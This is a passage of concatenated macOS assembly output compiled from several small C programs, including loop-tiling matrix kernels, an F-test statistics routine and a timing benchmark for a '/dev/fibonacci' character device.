%ecx addl _T(%rip), %ecx cmpl %ecx, %eax jae LBB2_34 ## %bb.28: ## in Loop: Header=BB2_27 Depth=3 movl -36(%rbp), %eax movl %eax, -48(%rbp) LBB2_29: ## Parent Loop BB2_1 Depth=1 ## Parent Loop BB2_3 Depth=2 ## Parent Loop BB2_27 Depth=3 ## => This Inner Loop Header: Depth=4 movl -48(%rbp), %eax movl -36(%rbp), %ecx subl _T(%rip), %ecx addl -44(%rbp), %ecx subl -40(%rbp), %ecx addl $1, %ecx cmpl %ecx, %eax jbe LBB2_32 ## %bb.30: ## in Loop: Header=BB2_29 Depth=4 movq -24(%rbp), %rax movl -44(%rbp), %ecx subl -48(%rbp), %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %edx movq -32(%rbp), %rax movslq -48(%rbp), %rcx imull (%rax,%rcx,4), %edx movq -16(%rbp), %rax movslq -44(%rbp), %rcx addl (%rax,%rcx,4), %edx movl %edx, (%rax,%rcx,4) ## %bb.31: ## in Loop: Header=BB2_29 Depth=4 movl -48(%rbp), %eax addl $-1, %eax movl %eax, -48(%rbp) jmp LBB2_29 LBB2_32: ## in Loop: Header=BB2_27 Depth=3 jmp LBB2_33 LBB2_33: ## in Loop: Header=BB2_27 Depth=3 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB2_27 LBB2_34: ## in Loop: Header=BB2_3 Depth=2 jmp LBB2_35 LBB2_35: ## in Loop: Header=BB2_3 Depth=2 jmp LBB2_36 LBB2_36: ## in Loop: Header=BB2_3 Depth=2 movl _T(%rip), %eax addl -40(%rbp), %eax movl %eax, -40(%rbp) jmp LBB2_3 LBB2_37: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_38 LBB2_38: ## in Loop: Header=BB2_1 Depth=1 movl _T(%rip), %ecx movl -36(%rbp), %eax subl %ecx, %eax movl %eax, -36(%rbp) jmp LBB2_1 LBB2_39: popq %rbp retq .cfi_endproc ## -- End function .globl __diff ## -- Begin function _diff .p2align 4, 0x90 __diff: ## @_diff .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movl %edx, -24(%rbp) movl %ecx, -28(%rbp) movq %r8, -40(%rbp) movq %r9, -48(%rbp) movl $0, -52(%rbp) LBB3_1: ## =>This Loop Header: Depth=1 ## Child Loop BB3_3 Depth 2 movl -52(%rbp), %eax cmpl -24(%rbp), %eax jge LBB3_10 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movl $0, -56(%rbp) LBB3_3: ## Parent Loop BB3_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -56(%rbp), %eax cmpl -28(%rbp), %eax jge LBB3_8 ## %bb.4: ## in Loop: Header=BB3_3 Depth=2 movq -40(%rbp), %rax movl -52(%rbp), %ecx addl -56(%rbp), %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %eax movq -48(%rbp), %rcx movl -52(%rbp), %edx addl -56(%rbp), %edx movslq %edx, %rdx cmpl (%rcx,%rdx,4), %eax je LBB3_6 ## %bb.5: movq -16(%rbp), %rsi movl -20(%rbp), %edx movl -52(%rbp), %ecx addl -56(%rbp), %ecx movl -52(%rbp), %r8d movl -56(%rbp), %r9d movq -40(%rbp), %rax movl -52(%rbp), %edi addl -56(%rbp), %edi movslq %edi, %rdi movl (%rax,%rdi,4), %r10d movq -48(%rbp), %rax movl -52(%rbp), %edi addl -56(%rbp), %edi movslq %edi, %rdi movl (%rax,%rdi,4), %eax leaq L_.str(%rip), %rdi movl %r10d, (%rsp) movl %eax, 8(%rsp) movb $0, %al callq _printf movl $1, -4(%rbp) jmp LBB3_11 LBB3_6: ## in Loop: Header=BB3_3 Depth=2 jmp LBB3_7 LBB3_7: ## in Loop: Header=BB3_3 Depth=2 movl -56(%rbp), %eax addl $1, %eax movl %eax, -56(%rbp) jmp LBB3_3 LBB3_8: ## in Loop: Header=BB3_1 Depth=1 jmp LBB3_9 LBB3_9: ## in Loop: Header=BB3_1 Depth=1 movl -52(%rbp), %eax addl $1, %eax movl %eax, -52(%rbp) jmp LBB3_1 LBB3_10: movl $0, -4(%rbp) LBB3_11: movl -4(%rbp), %eax addq $80, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _region ## -- Begin function region .p2align 4, 0x90 _region: ## @region .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $128, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl %edi, -12(%rbp) movl %esi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq %r8, -40(%rbp) movl -12(%rbp), %eax movl -16(%rbp), %ecx addl %ecx, %eax ## kill: def $rax killed $eax movq %rax, -120(%rbp) ## 8-byte Spill movq %rsp, %rcx movq %rcx, -72(%rbp) shlq $2, %rax callq ____chkstk_darwin addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -120(%rbp), %rax ## 8-byte Reload movq %rsp, %rcx movq %rcx, -112(%rbp) ## 8-byte Spill movq %rax, -80(%rbp) movl -12(%rbp), %eax movl -16(%rbp), %ecx addl %ecx, %eax ## kill: def $rax killed $eax movq %rax, -104(%rbp) ## 8-byte Spill shlq $2, %rax callq ____chkstk_darwin addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -104(%rbp), %rax ## 8-byte Reload movq %rsp, %rcx movq %rcx, -96(%rbp) ## 8-byte Spill movq %rax, -88(%rbp) movl $0, -60(%rbp) LBB4_1: ## =>This Loop Header: Depth=1 ## Child Loop BB4_3 Depth 2 movl -60(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_8 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movl $0, -64(%rbp) LBB4_3: ## Parent Loop BB4_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -64(%rbp), %eax cmpl -16(%rbp), %eax jge LBB4_6 ## %bb.4: ## in Loop: Header=BB4_3 Depth=2 movq -24(%rbp), %rax movl -60(%rbp), %ecx addl -64(%rbp), %ecx movslq %ecx, %rcx movl $0, (%rax,%rcx,4) callq _rand movl %eax, %edx movq -32(%rbp), %rax movslq -60(%rbp), %rcx movl %edx, (%rax,%rcx,4) callq _rand movl %eax, %edx movq -40(%rbp), %rax movslq -64(%rbp), %rcx movl %edx, (%rax,%rcx,4) ## %bb.5: ## in Loop: Header=BB4_3 Depth=2 movl -64(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) jmp LBB4_3 LBB4_6: ## in Loop: Header=BB4_1 Depth=1 jmp LBB4_7 LBB4_7: ## in Loop: Header=BB4_1 Depth=1 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB4_1 LBB4_8: movq -96(%rbp), %rdi ## 8-byte Reload movq -24(%rbp), %rsi movl -12(%rbp), %eax addl -16(%rbp), %eax movslq %eax, %rdx shlq $2, %rdx movq $-1, %rcx callq ___memcpy_chk movl -12(%rbp), %edi movl -16(%rbp), %esi movq -24(%rbp), %rdx movq -32(%rbp), %rcx movq -40(%rbp), %r8 callq _orig movq -112(%rbp), %rdi ## 8-byte Reload movq -24(%rbp), %rsi movl -12(%rbp), %eax addl -16(%rbp), %eax movslq %eax, %rdx shlq $2, %rdx movq $-1, %rcx callq ___memcpy_chk movq -112(%rbp), %r9 ## 8-byte Reload movl -16(%rbp), %edx movl -12(%rbp), %ecx movq -24(%rbp), %r8 leaq L_.str.1(%rip), %rdi movl $98, %esi callq __diff movq -96(%rbp), %rsi ## 8-byte Reload movq -24(%rbp), %rdi movl -12(%rbp), %eax addl -16(%rbp), %eax movslq %eax, %rdx shlq $2, %rdx movq $-1, %rcx callq ___memcpy_chk movl -12(%rbp), %edi movl -16(%rbp), %esi movq -24(%rbp), %rdx movq -32(%rbp), %rcx movq -40(%rbp), %r8 callq _skewed movq -112(%rbp), %r9 ## 8-byte Reload movl -16(%rbp), %edx movl -12(%rbp), %ecx movq -24(%rbp), %r8 leaq L_.str.1(%rip), %rdi movl $103, %esi callq __diff movq -96(%rbp), %rsi ## 8-byte Reload movq -24(%rbp), %rdi movl -12(%rbp), %eax addl -16(%rbp), %eax movslq %eax, %rdx shlq $2, %rdx movq $-1, %rcx callq ___memcpy_chk movl -12(%rbp), %edi movl -16(%rbp), %esi movq -24(%rbp), %rdx movq -32(%rbp), %rcx movq -40(%rbp), %r8 callq _tiled movq -112(%rbp), %r9 ## 8-byte Reload movl -16(%rbp), %edx movl -12(%rbp), %ecx movq -24(%rbp), %r8 leaq L_.str.1(%rip), %rdi movl $107, %esi callq __diff movq -72(%rbp), %rax movq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB4_10 ## %bb.9: xorl %eax, %eax movq %rbp, %rsp popq %rbp retq LBB4_10: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $112, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -12(%rbp) movl %edi, -16(%rbp) movq %rsi, -24(%rbp) cmpl $2, -16(%rbp) jl LBB5_2 ## %bb.1: movq -24(%rbp), %rax movq 8(%rax), %rdi callq _atoi movl %eax, _T(%rip) LBB5_2: movl _T(%rip), %eax shll $1, %eax movl %eax, -28(%rbp) movl _T(%rip), %eax shll $2, %eax movl %eax, -32(%rbp) cmpl $3, -16(%rbp) jl LBB5_4 ## %bb.3: movq -24(%rbp), %rax movq 16(%rax), %rdi callq _atoi imull _T(%rip), %eax movl %eax, -28(%rbp) LBB5_4: cmpl $4, -16(%rbp) jl LBB5_6 ## %bb.5: movq -24(%rbp), %rax movq 24(%rax), %rdi callq _atoi imull _T(%rip), %eax movl %eax, -32(%rbp) LBB5_6: movl -28(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -112(%rbp) ## 8-byte Spill movq %rsp, %rcx movq %rcx, -40(%rbp) shlq $2, %rax callq ____chkstk_darwin addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -112(%rbp), %rax ## 8-byte Reload movq %rsp, %rcx movq %rcx, -96(%rbp) ## 8-byte Spill movq %rax, -48(%rbp) movl -32(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -104(%rbp) ## 8-byte Spill shlq $2, %rax callq ____chkstk_darwin addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -104(%rbp), %rax ## 8-byte Reload movq %rsp, %rcx movq %rcx, -88(%rbp) ## 8-byte Spill movq %rax, -56(%rbp) movl -28(%rbp), %eax movl -32(%rbp), %ecx addl %ecx, %eax ## kill: def $rax killed $eax movq %rax, -80(%rbp) ## 8-byte Spill shlq $2, %rax callq ____chkstk_darwin movq -96(%rbp), %rcx ## 8-byte Reload movq -88(%rbp), %r8 ## 8-byte Reload addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -80(%rbp), %rax ## 8-byte Reload movq %rsp, %rdx movq %rax, -64(%rbp) movl -28(%rbp), %edi movl -32(%rbp), %esi callq _region movq -40(%rbp), %rax movq %rax, %rsp movl -12(%rbp), %eax movl %eax, -68(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB5_8 ## %bb.7: movl -68(%rbp), %eax ## 4-byte Reload movq %rbp, %rsp popq %rbp retq LBB5_8: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __DATA,__data .globl _T ## @T .p2align 2 _T: .long 10 ## 0xa .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%s:%d ! Diff %d (%d-%d) : %d %d\n" L_.str.1: ## @.str.1 .asciz "the_stack_data/136098.c" .subsections_via_symbols
the_stack_data/136098.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/1048632.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _ftest ; -- Begin function ftest .p2align 2 _ftest: ; @ftest .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] stur x2, [x29, #-24] stur x3, [x29, #-32] stur x4, [x29, #-40] str x5, [sp, #48] ldur x0, [x29, #-8] ldur x1, [x29, #-16] add x2, sp, #24 add x3, sp, #40 bl _avevar ldur x0, [x29, #-24] ldur x1, [x29, #-32] add x2, sp, #16 add x3, sp, #32 bl _avevar ldr d0, [sp, #40] ldr d1, [sp, #32] fcmp d0, d1 cset w8, le tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr d0, [sp, #40] ldr d1, [sp, #32] fdiv d0, d0, d1 ldur x8, [x29, #-40] str d0, [x8] ldur x8, [x29, #-16] subs x8, x8, #1 ucvtf d0, x8 str d0, [sp, #8] ldur x8, [x29, #-32] subs x8, x8, #1 ucvtf d0, x8 str d0, [sp] b LBB0_3 LBB0_2: ldr d0, [sp, #32] ldr d1, [sp, #40] fdiv d0, d0, d1 ldur x8, [x29, #-40] str d0, [x8] ldur x8, [x29, #-32] subs x8, x8, #1 ucvtf d0, x8 str d0, [sp, #8] ldur x8, [x29, #-16] subs x8, x8, #1 ucvtf d0, x8 str d0, [sp] b LBB0_3 LBB0_3: ldr d0, [sp] fmov d1, #0.50000000 fmul d0, d1, d0 ldr d2, [sp, #8] fmul d1, d1, d2 ldr d2, [sp] ldr d5, [sp] ldr d3, [sp, #8] ldur x8, [x29, #-40] ldr d4, [x8] fmadd d3, d3, d4, d5 fdiv d2, d2, d3 bl _betai fmov d1, d0 fmov d0, #2.00000000 fmul d0, d0, d1 ldr x8, [sp, #48] str d0, [x8] ldr x8, [sp, #48] ldr d0, [x8] fmov d1, #1.00000000 fcmp d0, d1 cset w8, le tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ldr x8, [sp, #48] ldr d1, [x8] fmov d0, #2.00000000 fsub d0, d0, d1 ldr x8, [sp, #48] str d0, [x8] b LBB0_5 LBB0_5: ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal16,16byte_literals .p2align 4 ## -- Begin function ftest LCPI0_0: .long 1127219200 ## 0x43300000 .long 1160773632 ## 0x45300000 .long 0 ## 0x0 .long 0 ## 0x0 LCPI0_1: .quad 0x4330000000000000 ## double 4503599627370496 .quad 0x4530000000000000 ## double 1.9342813113834067E+25 .section __TEXT,__literal8,8byte_literals .p2align 3 LCPI0_2: .quad 0x3ff0000000000000 ## double 1 LCPI0_3: .quad 0x4000000000000000 ## double 2 LCPI0_4: .quad 0x3fe0000000000000 ## double 0.5 .section __TEXT,__text,regular,pure_instructions .globl _ftest .p2align 4, 0x90 _ftest: ## @ftest .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq %r8, -40(%rbp) movq %r9, -48(%rbp) movq -8(%rbp), %rdi movq -16(%rbp), %rsi leaq -72(%rbp), %rdx leaq -56(%rbp), %rcx callq _avevar movq -24(%rbp), %rdi movq -32(%rbp), %rsi leaq -80(%rbp), %rdx leaq -64(%rbp), %rcx callq _avevar movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero ucomisd -64(%rbp), %xmm0 jbe LBB0_2 ## %bb.1: movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd -64(%rbp), %xmm1 ## xmm1 = mem[0],zero divsd %xmm1, %xmm0 movq -40(%rbp), %rax movsd %xmm0, (%rax) movq -16(%rbp), %rax decq %rax movq %rax, %xmm0 movaps LCPI0_0(%rip), %xmm2 ## xmm2 = [1127219200,1160773632,0,0] punpckldq %xmm2, %xmm0 ## xmm0 = xmm0[0],xmm2[0],xmm0[1],xmm2[1] movapd LCPI0_1(%rip), %xmm1 ## xmm1 = [4.503599627370496E+15,1.9342813113834067E+25] subpd %xmm1, %xmm0 movaps %xmm0, %xmm3 unpckhpd %xmm0, %xmm0 ## xmm0 = xmm0[1,1] addsd %xmm3, %xmm0 movsd %xmm0, -88(%rbp) movq -32(%rbp), %rax decq %rax movq %rax, %xmm0 punpckldq %xmm2, %xmm0 ## xmm0 = xmm0[0],xmm2[0],xmm0[1],xmm2[1] subpd %xmm1, %xmm0 movaps %xmm0, %xmm1 unpckhpd %xmm0, %xmm0 ## xmm0 = xmm0[1,1] addsd %xmm1, %xmm0 movsd %xmm0, -96(%rbp) jmp LBB0_3 LBB0_2: movsd -64(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd -56(%rbp), %xmm1 ## xmm1 = mem[0],zero divsd %xmm1, %xmm0 movq -40(%rbp), %rax movsd %xmm0, (%rax) movq -32(%rbp), %rax decq %rax movq %rax, %xmm0 movaps LCPI0_0(%rip), %xmm2 ## xmm2 = [1127219200,1160773632,0,0] punpckldq %xmm2, %xmm0 ## xmm0 = xmm0[0],xmm2[0],xmm0[1],xmm2[1] movapd LCPI0_1(%rip), %xmm1 ## xmm1 = [4.503599627370496E+15,1.9342813113834067E+25] subpd %xmm1, %xmm0 movaps %xmm0, %xmm3 unpckhpd %xmm0, %xmm0 ## xmm0 = xmm0[1,1] addsd %xmm3, %xmm0 movsd %xmm0, -88(%rbp) movq -16(%rbp), %rax decq %rax movq %rax, %xmm0 punpckldq %xmm2, %xmm0 ## xmm0 = xmm0[0],xmm2[0],xmm0[1],xmm2[1] subpd %xmm1, %xmm0 movaps %xmm0, %xmm1 unpckhpd %xmm0, %xmm0 ## xmm0 = xmm0[1,1] addsd %xmm1, %xmm0 movsd %xmm0, -96(%rbp) LBB0_3: movsd LCPI0_4(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd -96(%rbp), %xmm0 movsd LCPI0_4(%rip), %xmm1 ## xmm1 = mem[0],zero mulsd -88(%rbp), %xmm1 movsd -96(%rbp), %xmm2 ## xmm2 = mem[0],zero movsd -96(%rbp), %xmm4 ## xmm4 = mem[0],zero movsd -88(%rbp), %xmm3 ## xmm3 = mem[0],zero movq -40(%rbp), %rax movsd (%rax), %xmm5 ## xmm5 = mem[0],zero mulsd %xmm5, %xmm3 addsd %xmm4, %xmm3 divsd %xmm3, %xmm2 callq _betai movaps %xmm0, %xmm1 movsd LCPI0_3(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 movq -48(%rbp), %rax movsd %xmm0, (%rax) movq -48(%rbp), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movsd LCPI0_2(%rip), %xmm1 ## xmm1 = mem[0],zero ucomisd %xmm1, %xmm0 jbe LBB0_5 ## %bb.4: movq -48(%rbp), %rax movsd LCPI0_3(%rip), %xmm0 ## xmm0 = mem[0],zero subsd (%rax), %xmm0 movq -48(%rbp), %rax movsd %xmm0, (%rax) LBB0_5: addq $96, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/34513055.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _comp ; -- Begin function comp .p2align 2 _comp: ; @comp .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #16] str x1, [sp, #8] ldr x8, [sp, #16] ldr w8, [x8] str w8, [sp, #4] ldr x8, [sp, #8] ldr w8, [x8] str w8, [sp] ldr w8, [sp, #4] ldr w9, [sp] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: mov w8, #1 str w8, [sp, #28] b LBB0_5 LBB0_2: ldr w8, [sp, #4] ldr w9, [sp] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: mov w8, #-1 str w8, [sp, #28] b LBB0_5 LBB0_4: str wzr, [sp, #28] b LBB0_5 LBB0_5: ldr w0, [sp, #28] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 mov w9, #8416 adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 sub sp, sp, #2, lsl #12 ; =8192 sub sp, sp, #224 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #100] mov w8, #1000 str w8, [sp, #84] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF mov w1, #2 bl _open str w0, [sp, #44] ldr w8, [sp, #44] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _perror mov w0, #1 bl _exit LBB1_2: str wzr, [sp, #40] b LBB1_3 LBB1_3: ; =>This Loop Header: Depth=1 ; Child Loop BB1_5 Depth 2 ; Child Loop BB1_7 Depth 3 ; Child Loop BB1_11 Depth 3 ldr w8, [sp, #40] ldr w9, [sp, #84] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_18 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=1 ldr w0, [sp, #44] ldrsw x1, [sp, #40] mov w2, #0 bl _lseek str wzr, [sp, #36] b LBB1_5 LBB1_5: ; Parent Loop BB1_3 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB1_7 Depth 3 ; Child Loop BB1_11 Depth 3 ldr w8, [sp, #36] subs w8, w8, #2 cset w8, ge tbnz w8, #0, LBB1_16 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_5 Depth=2 str wzr, [sp, #32] b LBB1_7 LBB1_7: ; Parent Loop BB1_3 Depth=1 ; Parent Loop BB1_5 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #32] subs w8, w8, #1000 cset w8, ge tbnz w8, #0, LBB1_10 b LBB1_8 LBB1_8: ; in Loop: Header=BB1_7 Depth=3 mov w0, #6 str w0, [sp, #16] ; 4-byte Folded Spill add x1, sp, #64 bl _clock_gettime ldr w0, [sp, #44] ldrsw x2, [sp, #36] add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #4012 bl _write mov x8, x0 ldr w0, [sp, #16] ; 4-byte Folded Reload str x8, [sp, #88] add x1, sp, #48 bl _clock_gettime ldr x8, [sp, #88] ldrsw x10, [sp, #32] add x9, sp, #104 str x8, [x9, x10, lsl #3] b LBB1_9 LBB1_9: ; in Loop: Header=BB1_7 Depth=3 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB1_7 LBB1_10: ; in Loop: Header=BB1_5 Depth=2 add x0, sp, #104 mov x1, #1000 mov x2, #8 adrp x3, _comp@PAGE add x3, x3, _comp@PAGEOFF bl _qsort str xzr, [sp, #24] mov w8, #30 str w8, [sp, #20] b LBB1_11 LBB1_11: ; Parent Loop BB1_3 Depth=1 ; Parent Loop BB1_5 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #20] subs w8, w8, #980 cset w8, ge tbnz w8, #0, LBB1_14 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_11 Depth=3 ldrsw x9, [sp, #20] add x8, sp, #104 ldr x9, [x8, x9, lsl #3] ldr x8, [sp, #24] add x8, x8, x9 str x8, [sp, #24] b LBB1_13 LBB1_13: ; in Loop: Header=BB1_11 Depth=3 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB1_11 LBB1_14: ; in Loop: Header=BB1_5 Depth=2 ldr x8, [sp, #24] mov x9, #950 sdiv x8, x8, x9 str x8, [sp, #24] ldr x8, [sp, #24] mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB1_15 LBB1_15: ; in Loop: Header=BB1_5 Depth=2 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB1_5 LBB1_16: ; in Loop: Header=BB1_3 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB1_17 LBB1_17: ; in Loop: Header=BB1_3 Depth=1 ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB1_3 LBB1_18: ldr w0, [sp, #44] bl _close ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_20 b LBB1_19 LBB1_19: bl ___stack_chk_fail LBB1_20: mov w0, #0 add sp, sp, #2, lsl #12 ; =8192 add sp, sp, #224 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "/dev/fibonacci" l_.str.1: ; @.str.1 .asciz "Failed to open character device" l_.str.2: ; @.str.2 .asciz "%lld " l_.str.3: ; @.str.3 .asciz "\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _comp ## -- Begin function comp .p2align 4, 0x90 _comp: ## @comp .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq -16(%rbp), %rax movl (%rax), %eax movl %eax, -28(%rbp) movq -24(%rbp), %rax movl (%rax), %eax movl %eax, -32(%rbp) movl -28(%rbp), %eax cmpl -32(%rbp), %eax jle LBB0_2 ## %bb.1: movl $1, -4(%rbp) jmp LBB0_5 LBB0_2: movl -28(%rbp), %eax cmpl -32(%rbp), %eax jge LBB0_4 ## %bb.3: movl $-1, -4(%rbp) jmp LBB0_5 LBB0_4: movl $0, -4(%rbp) LBB0_5: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $8416, %eax ## imm = 0x20E0 callq ____chkstk_darwin subq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -8324(%rbp) movl $1000, -8340(%rbp) ## imm = 0x3E8 leaq L_.str(%rip), %rdi movl $2, %esi movb $0, %al callq _open movl %eax, -8380(%rbp) cmpl $0, -8380(%rbp) jge LBB1_2 ## %bb.1: leaq L_.str.1(%rip), %rdi callq _perror movl $1, %edi callq _exit LBB1_2: movl $0, -8384(%rbp) LBB1_3: ## =>This Loop Header: Depth=1 ## Child Loop BB1_5 Depth 2 ## Child Loop BB1_7 Depth 3 ## Child Loop BB1_11 Depth 3 movl -8384(%rbp), %eax cmpl -8340(%rbp), %eax jg LBB1_18 ## %bb.4: ## in Loop: Header=BB1_3 Depth=1 movl -8380(%rbp), %edi movslq -8384(%rbp), %rsi xorl %edx, %edx callq _lseek movl $0, -8388(%rbp) LBB1_5: ## Parent Loop BB1_3 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB1_7 Depth 3 ## Child Loop BB1_11 Depth 3 cmpl $2, -8388(%rbp) jge LBB1_16 ## %bb.6: ## in Loop: Header=BB1_5 Depth=2 movl $0, -8392(%rbp) LBB1_7: ## Parent Loop BB1_3 Depth=1 ## Parent Loop BB1_5 Depth=2 ## => This Inner Loop Header: Depth=3 cmpl $1000, -8392(%rbp) ## imm = 0x3E8 jge LBB1_10 ## %bb.8: ## in Loop: Header=BB1_7 Depth=3 movl $6, %edi leaq -8360(%rbp), %rsi callq _clock_gettime movl -8380(%rbp), %edi leaq -320(%rbp), %rsi movslq -8388(%rbp), %rdx callq _write movq %rax, -8336(%rbp) movl $6, %edi leaq -8376(%rbp), %rsi callq _clock_gettime movq -8336(%rbp), %rcx movslq -8392(%rbp), %rax movq %rcx, -8320(%rbp,%rax,8) ## %bb.9: ## in Loop: Header=BB1_7 Depth=3 movl -8392(%rbp), %eax addl $1, %eax movl %eax, -8392(%rbp) jmp LBB1_7 LBB1_10: ## in Loop: Header=BB1_5 Depth=2 leaq -8320(%rbp), %rdi movl $1000, %esi ## imm = 0x3E8 movl $8, %edx leaq _comp(%rip), 